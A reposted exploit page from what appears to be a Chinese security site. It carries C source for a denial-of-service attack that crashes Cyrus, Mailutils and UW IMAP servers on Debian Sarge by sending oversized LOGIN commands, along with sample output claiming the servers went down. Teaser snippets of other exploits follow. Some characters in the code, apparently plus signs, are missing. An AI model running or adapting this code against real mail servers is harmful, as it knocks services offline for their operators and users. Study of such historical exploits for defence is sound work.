Debian Sarge Multiple IMAP Server Denial of Service Exploit

所属分类: 网络安全 / Exploit 阅读数: 125
收藏 0 赞 0 分享
/*

Debian Sarge Multiple IMAP Server DoS (debianimapers.c)
Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]

Testing Cyrus IMAPd:

bash$ ./debianimapers 192.168.0.189

.....

39 tries and imapd goes down! Mission Complete!

Testing Mailutil's IMAP4d:

bash$ ./debianimapers 192.168.0.189

.....

38 tries and imapd goes down! Mission Complete!

Testing UW-IMAPd:

bash$ ./debianimapers 192.168.0.189

.....

39 tries and imapd goes down! Mission Complete!

bash$

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define COUNT 100
#define SIZE 100000

char imaplogin[] = "A0001 LOGIN";

int main(int argc, char *argv[])
{

char buffer[SIZE], imapped[SIZE 30];
int i, port = 143;

memset(buffer, 0x41, sizeof(buffer));
memset(imapped, 0, sizeof(imapped));

snprintf(imapped, sizeof(imapped)-1, "%s %s %s\r\n\r\n", imaplogin, buffer, buffer);

if(argc < 2)
{

printf("\nDebian Sarge Multiple IMAP Server DoS");
printf("\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n");

printf("\nUsage %s <host>\n\n", argv[0]);

return 0;
}

printf("\nDebian Sarge Multiple IMAP Server DoS");
printf("\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n");

int sock;
struct sockaddr_in remote;

remote.sin_family = AF_INET;
remote.sin_port = htons(port);
remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()\n"); return -1; }
if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("Error: connect(%s:%d)\n", argv[1], port); return -1; }

close(sock);

printf("\nUsually takes ~1-2 minutes, LAN/Internet and connection speed will make time vary...\n");

for(i = 0; i <= COUNT; i )
{

struct sockaddr_in remote;
remote.sin_family = AF_INET;
remote.sin_port = htons(port);
remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()\n"); return -1; }

sleep(1);

if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("\n%d tries and imapd goes down! Mission Complete!\n\n", i); return -1; }

int len = sizeof(imapped);
send(sock, imapped, len, 0);
close(sock);

}

return 0;
}

更多精彩内容其他人还在看

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

// ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin (you 31337!!! ;)) // thanks to sacrin
收藏 0 赞 0 分享

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

#!/usr/bin/perl # # Remote Oracle KUPM$MCP.MAIN exploit (10g) # # Grant or revoke dba permission to unprivileged user # #
收藏 0 赞 0 分享

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field b
收藏 0 赞 0 分享

MS Internet Explorer Recordset Double Free Memory Exploit

<HTML> <!-- ********************************************************************************** Microsoft Internet Explo
收藏 0 赞 0 分享

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

#!/usr/bin/python # Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability # was discovered by h07 and a POC for wi
收藏 0 赞 0 分享

Linux Kernel

/* Linux Kernel DCCP Memory Disclosure Vulnerability Synopsis: The Linux kernel is susceptible to a locally exploitable flaw w
收藏 0 赞 0 分享

MS Internet Explorer (FTP Server Response) DoS Exploit

#!/usr/bin/perl # MS 07-016 FTP Server Response PoC # Usage: ./ms07016ftp.pl [LISTEN_IP] # # Tested Against: MSIE 6.0290
收藏 0 赞 0 分享

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

#!/usr/bin/python # MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit # Bug discovered by Krystia
收藏 0 赞 0 分享

Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)

MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC ###### Author ###### LifeAsaGeek at gmail.com ... and
收藏 0 赞 0 分享

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

<!-- ----------------------------------------------------------------------------------------------------------- BrowseDialog Cla
收藏 0 赞 0 分享
查看更多